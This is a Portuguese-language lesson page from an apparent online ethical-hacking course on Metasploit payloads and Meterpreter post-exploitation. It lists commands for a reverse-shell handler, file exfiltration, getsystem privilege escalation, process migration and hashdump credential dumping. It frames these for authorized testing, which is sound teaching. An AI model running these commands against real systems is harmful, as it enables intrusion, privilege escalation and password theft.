Cargas úteis e Meterpreter
Shell pós-exploração
Cargas úteis e Meterpreter é uma aula grátis de Ethical Hacking Academy no CoddyKit. Esta é a aula 3 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Ethical Hacking Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Ethical Hacking Academy inclui 4 aulas no total.
O que é uma carga útil
Uma carga útil é o código executado no alvo depois que uma exploração tem sucesso. Ela define o que você poderá fazer em seguida, desde executar um único comando até abrir um shell interativo completo.
A escolha da carga útil correta depende do OS do alvo, da configuração da rede e do nível de acesso necessário.
Com estágios versus sem estágios
As cargas úteis usam dois estilos de entrega:
- Com estágios (observe o
/emmeterpreter/reverse_tcp): envia primeiro um pequeno componente, que depois baixa a carga útil completa. A presença inicial é menor. - Sem estágios (observe o
_emmeterpreter_reverse_tcp): a carga útil inteira é entregue de uma vez. É mais confiável em redes instáveis.
Shells de ligação versus reversos
Há duas direções de conexão:
- Shell de ligação: o alvo abre uma porta e aguarda; você se conecta a ele. Frequentemente é bloqueado por firewalls.
- Shell reverso: o alvo se conecta de volta a você (LHOST/LPORT). Normalmente passa por firewalls que permitem conexões de saída.
Por esse motivo, as cargas úteis reversas são o padrão mais comum.
Conhecendo o Meterpreter
O Meterpreter é a carga útil avançada do Metasploit. Diferentemente de um shell de comandos básico, ele é executado na memória, comunica-se por um canal criptografado e oferece um conjunto amplo de comandos para pós-exploração.
Como evita gravar no disco, ele é mais discreto do que a criação de um executável separado.
Comandos essenciais do Meterpreter
Depois que você obtiver uma sessão do Meterpreter, os comandos fundamentais ajudarão a orientar você no alvo.
sysinfo # OS, architecture, hostname
getuid # current user context
ps # running processes
pwd ls cd # filesystem navigationTransferência de arquivos
O Meterpreter move arquivos entre sua máquina e o alvo com comandos simples, úteis para coletar evidências ou preparar ferramentas em testes autorizados.
download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\Acessando um shell do sistema
O comando shell leva você do Meterpreter ao interpretador de comandos nativo do alvo (cmd.exe ou /bin/sh) quando você precisa executar diretamente comandos do OS.
Digite exit para retornar ao prompt do Meterpreter sem perder a sessão.
shell
# C:\> whoami
# exit -> back to meterpreterEscalonamento de privilégios
É comum você obter acesso inicialmente com privilégios limitados. O Meterpreter ajuda a escalá-los:
getsystemtenta técnicas conhecidas para obter SYSTEM no Windows.- O módulo pós-exploração
local_exploit_suggesterrecomenda explorações locais de escalonamento de privilégios para o host.
Privilégios mais altos liberam a extração de credenciais e um acesso mais profundo.
getsystem
run post/multi/recon/local_exploit_suggesterMigrando processos
Sua sessão vive dentro de um processo. Se esse processo for instável ou provavelmente encerrado, use migrate para passar a um processo mais estável e duradouro, mantendo sua sessão ativa.
Migrar para um processo que corresponda ao seu nível de privilégio também ajuda a se misturar ao ambiente e pode alterar o contexto do usuário.
ps
migrate 1340 # migrate into a stable PIDMantendo o acesso
O Meterpreter inclui recursos para capturar dados úteis durante avaliações autorizadas, como hashdump para coletar hashes de senhas e ferramentas de captura de teclas para demonstrar o impacto da captura de entrada.
Use esses recursos somente dentro do escopo acordado e documente tudo no relatório do cliente.
hashdump
run post/windows/gather/checkvmManipuladores
Uma carga útil reversa precisa de algo escutando do seu lado para capturar a conexão. O módulo multi/handler desempenha esse papel. Configure-o com a mesma carga útil, LHOST e LPORT usados para gerar a carga útil.
Isso é essencial quando você entrega uma carga útil do msfvenom fora do console: inicie primeiro o manipulador e depois acione a carga útil no alvo.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -jVerificação rápida
Escolha a carga útil que contorna um firewall restritivo.
Recapitulação
Você aprendeu sobre cargas úteis e o Meterpreter:
- As cargas úteis podem ter estágios (/) ou não ter estágios (_), além de serem de ligação ou reversas; as reversas geralmente superam os firewalls.
- O Meterpreter é executado na memória por um canal criptografado e oferece comandos abrangentes.
- Tarefas essenciais: sysinfo, getuid, ps, download/upload, shell.
- Escale privilégios com getsystem e local_exploit_suggester; use migrate para obter estabilidade.
- Use recursos de coleta somente dentro do escopo e documente tudo.
A seguir: módulos pós-exploração, pivotamento e coleta de dados.
Aprenda Ethical Hacking Academy com um tutor de IA — grátis
Escreva e execute código real no seu navegador, obtenha ajuda instantânea de um tutor de IA 24/7 e continue de onde parou na web ou no app.
- Cursos
- 31
- Aulas
- 111
Perguntas Frequentes
A aula “Cargas úteis e Meterpreter” é grátis?
Sim — o texto completo de “Cargas úteis e Meterpreter” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Ethical Hacking Academy, atualize para CoddyKit PRO. O curso de Ethical Hacking Academy inclui 4 aulas no total.
O que vou aprender em “Cargas úteis e Meterpreter”?
Shell pós-exploração Você pratica Ethical Hacking Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Ethical Hacking Academy?
Nenhuma experiência prévia é necessária. Ethical Hacking Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 3 de 4.
Quanto tempo leva a aula “Cargas úteis e Meterpreter”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Ethical Hacking Academy?
Sim. Cada aula de Ethical Hacking Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Arquitetura do Metasploit
- Pesquisa e uso de exploits
- Cargas úteis e Meterpreter
- Módulos pós-exploração